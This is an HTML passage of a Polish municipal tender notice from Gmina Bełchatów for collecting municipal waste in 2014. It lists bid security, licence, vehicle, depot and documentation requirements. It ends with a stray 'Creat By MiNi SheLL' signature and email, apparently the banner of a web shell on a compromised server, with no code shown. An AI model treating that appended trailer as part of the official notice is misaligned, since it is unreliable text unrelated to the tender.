3)  Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego: ING Bank Śląski Nr konta   61 1050 1461 1000 0023 5331 9805. Wadium jest wniesione w terminie, jeżeli bank prowadzący rachunek Zamawiającego potwierdzi, wpływ środków pieniężnych na wskazany w SIWZ rachunek, przed upływem daty i godziny składania ofert. W przypadku wniesienia wadium w formie innej niż pieniądz - wadium uważa się za wniesione w terminie, jeżeli Zamawiający potwierdzi fakt wniesienia wadium przed upływem daty i godziny składania ofert. Wykonawcy składają wadium w sekretariacie, kasie lub w Zespole zamówień Publicznych i Funduszy Zewnętrznych Urzędu Gminy Bełchatów. 

4) W przypadku wniesienia wadium w formie gwarancji bankowej lub ubezpieczeniowej, Zamawiający wymaga by gwarancja zawierała również przesłanki utraty wadium, określone w ustawie Prawo zamówień publicznych oraz bezwarunkowe zobowiązanie Gwaranta do zapłaty wadium na pierwsze, pisemne wezwanie Zamawiającego.
5) Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku, o którym mowa powyższym punkcie Zamawiający wymaga potwierdzenia posiadania uprawnień do wykonywania określonej działalności, zgodnie z obowiązującymi przepisami prawa: 

a. 1) wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami Ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminie /Dz. U. z 2013 r.,  poz. 1399 ze zm./, prowadzonego przez Wójta Gminy Bełchatów.

a. 2) zezwolenia na transport odpadów komunalnych wydane przez właściwego starostę, o którym mowa w art. 28 ust. 1 ustawy z dnia 27 kwietnia 2001 r. o odpadach /Dz. U. z 2010 r. nr 185 poz. 1243 ze zmianami/ lub zaświadczenia o wpisie do rejestru, o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach /Dz. U. z 2013 r., poz. 21/ lub inne ważne zezwolenie obejmujące swym zakresem zezwolenie na transport odpadów będących przedmiotem niniejszego zamówienia.

a. 3) wpisu do rejestru podmiotów zbierających zużyty sprzęt elektryczny
i  elektroniczny prowadzonego przez Głównego Inspektora Ochrony Środowiska zgodnie z ustawą z dnia 29 lipca 2005 roku o zużytym sprzęcie elektrycznym
i elektronicznym /Dz. U. z 2013 r., poz. 1155/, lub wpis do rejestru, o którym mowa
w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach /Dz. U. z 2013 r. Poz. 21/.

a. 4) zezwolenia na zbieranie odpadów, o którym mowa w art. 41 ustawy z dnia 14           grudnia 2012 r. o odpadach /Dz . U. z 2013 r., poz. 21/ lub posiada aktualne zezwolenie na zbieranie  odpadów wynikające z art. 28 ustawy z dnia 27 kwietnia 2001 r.
o odpadach /Dz. U. z 2010 r. nr 185 poz. 1243 ze zmianami/, w zakresie objętym przedmiotem umowy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku, o którym mowa w powyższym punkcie Zamawiający wymaga potwierdzenia wykonania z należytą starannością co najmniej jednej usługi polegającej na odbieraniu odpadów komunalnych z nieruchomości na kwotę brutto nie mniejszą niż
300 000 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku, o którym mowa w powyższym pkt. 1, lit. c) Zamawiający wymaga dysponowania odpowiednim potencjałem technicznym, zgodnie z poniższym opisem:

c. 1) Wykonawca będzie dysponował na czas realizacji zadania:
- co najmniej 2 samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych, 
- co najmniej 2 samochodami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych,
- co najmniej 1 pojazdem do odbierania odpadów komunalnych bez funkcji kompaktującej
- co najmniej 1 samochodem dostosowanym do odbioru odpadów  z nieruchomości,  do których dojazd jest utrudniony stale lub okresowo,  ze względu na warunki terenowe lub  atmosferyczne.
 - pojazdami trwale i czytelnie oznakowanymi w widocznym miejscu nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości, 
- pojazdami wyposażonymi w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiającego trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju oraz czujników zapisujących dane o miejscach wyładunków odpadów.
c. 2) posiada bazę magazynowo - transportową:
- usytuowaną w gminie, z której terenu odbiera te odpady lub w odległości nie większej niż 60 km od granicy tej gminy,
- usytuowanie na terenie, do którego posiada tytuł prawny, 
- wyposażaną w miejsce przeznaczone do parkowania pojazdów zabezpieczone przed emisją zanieczyszczeń do gruntu,
- wyposażaną w miejsce do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych, zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych,
- wyposażoną w legalizowaną samochodową wagę najazdową, w przypadku gdy na terenie bazy następuje magazynowanie odpadów,
- wyposażoną w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych,
- wyposażoną w pomieszczenia socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,
- na terenie której znajduje punkt konserwacji i napraw pojazdów oraz miejsc do mycia i dezynfekcji pojazdów, o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy transportowej.
Zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11.01.2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku, o którym mowa powyżej Zamawiający nie stawia dodatkowych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku, o którym mowa w pkt. 1, lit. d) Zamawiający wymaga ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na minimalna sumę gwarancyjną 500.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych Zamawiający żąda następujących dokumentów:
1.1. oświadczenie o spełnieniu warunków udziału w postępowaniu - wg wzoru załącznika nr 2 do SIWZ; 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - oświadczenie jest dokumentem wspólnym. Wykonawcy mogą złożyć oświadczenie wspólnie lub każdy odrębnie.

1.2. wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami Ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminie ( Dz. U. z 2013 r.,  poz. 1399 ze zm.), prowadzonego przez Wójta Gminy Bełchatów.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument  jest dokumentem  odrębnym. Dokument składa którykolwiek z tych wykonawców. Złożone dokumenty podlegają łącznej ocenie. 

1.3. zezwolenie na transport odpadów komunalnych wydane przez właściwego starostę, o którym mowa w art. 28 ust. 1 ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2010 r. nr 185 poz. 1243 ze zmianami) lub zaświadczenie o wpisie do rejestru, o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21) lub inne ważne zezwolenie obejmujące swym zakresem zezwolenie na transport odpadów będących przedmiotem niniejszego zamówienia.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument  jest dokumentem  odrębnym. Dokument składa którykolwiek z tych wykonawców. Złożone dokumenty podlegają łącznej ocenie. 

1.4. wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny
i  elektroniczny prowadzonego przez Głównego Inspektora Ochrony Środowiska zgodnie z ustawą z dnia 29 lipca 2005 roku o zużytym sprzęcie elektrycznym
i elektronicznym (Dz. U. z 2013 r., poz. 1155), lub wpis do rejestru, o którym mowa
w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. Poz. 21).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument  jest dokumentem  odrębnym. Dokument składa którykolwiek z tych wykonawców. Złożone dokumenty podlegają łącznej ocenie. 

1.5. zezwolenie na zbieranie odpadów, o którym mowa w art. 41 ustawy z dnia 14           grudnia 2012 r. o odpadach (Dz . U. z 2013 r., poz. 21) lub posiada aktualne zezwolenie na zbieranie  odpadów wynikające z art. 28 ustawy z dnia 27 kwietnia 2001 r.
o odpadach (Dz. U. z 2010 r. nr 185 poz. 1243 ze zmianami), w zakresie objętym przedmiotem umowy.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument  jest dokumentem  odrębnym. Dokument składa którykolwiek z tych wykonawców. Złożone dokumenty podlegają łącznej ocenie. 

1.6. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie (wg wzoru stanowiącego załącznik nr 3 do SIWZ) - dla potwierdzenia spełniania warunku udziału w postępowaniu opisanego w Rozdziale V, pkt 2 lit. b) SIWZ;  
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument  jest dokumentem  odrębnym. Dokument składa którykolwiek z tych wykonawców. Złożone dokumenty podlegają łącznej ocenie. 

1.7. wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami (wg wzoru stanowiącego załącznik nr 4 do SIWZ) - dla potwierdzenia spełniania warunku udziału w postępowaniu opisanego w Rozdziale V, pkt 2 lit. c) SIWZ; 
	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument  	jest dokumentem  odrębnym. Dokument składa którykolwiek z tych wykonawców. Złożone 	dokumenty podlegają łącznej ocenie. 

1.8. opłacona polisa, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - dla potwierdzenia spełniania warunku udziału w postępowaniu opisanego w Rozdziale V, pkt 2 lit. d) SIWZ
	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - 	dokument jest dokumentem odrębnym. Dokument składa którykolwiek z tych 	wykonawców. Złożone dokumenty podlegają łącznej ocenie. 

2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zamawiający wymaga przedstawienia zobowiązania, o którym mowa powyżej  w formie oryginału. 

3. W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy do oferty dołączyć należy:
 
1) oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych - wg wzoru załącznika nr 5 do SIWZ;
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - oświadczenie jest dokumentem odrębnym. Dokument składa każdy z tych Wykonawców.


2) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześnie niż 6 miesięcy przed upływem terminu składania ofert;
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument jest dokumentem odrębnym. Dokument składa każdy z tych Wykonawców.

3) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument jest dokumentem odrębnym. Dokument składa każdy z tych Wykonawców.

4) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument jest dokumentem odrębnym. Dokument składa każdy z tych Wykonawców.

4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 pkt 1 Rozporządzenia Prezesa  Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 2013.231) - składa dokument lub dokumenty wystawione w kraju, w którym ma miejsce zamieszkania lub siedzibę, potwierdzające odpowiednio, że posiada uprawnienia do wykonywania działalności związanej z przedmiotem zamówienia.

5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów:
1) o których mowa w § 3 ust. 1 Rozporządzenia Prezesa  Rady Ministrów z dnia 19 lutego 2013 r.w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 2013.231):
a) pkt 2-4 i 6 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,

6. Dokumenty, o których mowa w § 4 ust. 1 pkt 1 lit. a tiret pierwszy Rozporządzenia Prezesa  Rady Ministrów z dnia 19 lutego 2013 r.w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 2013.231), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w § 4 ust. 1 pkt 1 lit. a tiret drugi Rozporządzenia Prezesa  Rady Ministrów z dnia 19 lutego 2013 r.w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 2013.231), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

7. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w § 4 ust. 1 Rozporządzenia Prezesa  Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 2013.231), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis § 4 ust. 2 Rozporządzenia Prezesa  Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 2013.231) stosuje się odpowiednio.

8. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (w ramach oferty wspólnej
w rozumieniu art. 23 ustawy Prawo zamówień publicznych).

9. W przypadku, o którym mowa w pkt. 8, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

10. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty. 

11. Jeżeli oferta wykonawców, o których mowa w pkt 8, została wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.

12. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. Zamawiający nie wyraża zgody na odstąpienie od zasady prowadzenia postępowania w języku polskim, o którym mowa w art. 9 ust. 3 ustawy.  

13.  Inne dokumenty wymagane przez Zamawiającego:
1) Wypełniony Formularz oferty przetargowej , wzór stanowi załącznik nr 1 do SIWZ,
2) Lista podmiotów należących do tej samej grupy kapitałowej,  w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), o której mowa a art. 24 ust. 2 pkt 5, albo informacja o tym, że Wykonawca nie należy do grupy kapitałowej (pkt. 9 Formularza oferty przetargowej) -  wzór listy podmiotów  należących do tej samej grupy kapitałowej stanowi załącznik nr 6 do niniejszej specyfikacji i obowiązuje tylko wykonawców należących do tej samej grupy kapitałowej. W przypadku braku powiązań kapitałowych, o których mowa w art. 24 ust. 2 pkt 5 ustawy PZP, wykonawca nie ma obowiązku składania załącznika nr 6.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Lista podmiotów należących do tej samej grupy kapitałowej  jest dokumentem odrębnym.    Dokument składa każdy z tych Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugbelchatow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bełchatów
Zespół Zamówień Publicznych i Funduszy Zewnętrznych /II piętro, pok.44/
ul. Kościuszki 13
97-400 Bełchatów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2014 godzina 10:30, miejsce: Urząd Gminy Bełchatów
Zespół Zamówień Publicznych i Funduszy Zewnętrznych /II piętro, pok.44/
Sekretariat
ul. Kościuszki 13
97-400 Bełchatów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com